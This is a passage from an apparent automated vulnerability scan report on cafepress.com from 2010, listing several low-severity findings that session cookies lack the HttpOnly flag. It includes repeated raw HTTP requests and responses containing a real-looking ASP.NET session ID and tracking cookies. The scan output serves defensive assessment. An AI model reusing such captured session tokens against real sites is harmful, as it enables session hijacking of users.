GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 63735 Date: Sun, 26 Dec 2010 13:48:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.18. http://www.cafepress.com/+greeting_cards
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+greeting_cards
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59651 Date: Sun, 26 Dec 2010 13:48:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.19. http://www.cafepress.com/+hats-caps
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+hats-caps
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59393 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.20. http://www.cafepress.com/+ipad-cases
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+ipad-cases
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 88266 Date: Sun, 26 Dec 2010 13:44:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.21. http://www.cafepress.com/+iphone-cases
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+iphone-cases
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 65212 Date: Sun, 26 Dec 2010 13:48:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65212 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.22. http://www.cafepress.com/+journals
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+journals
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59322 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59322 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.23. http://www.cafepress.com/+keepsake_boxes
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+keepsake_boxes
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; 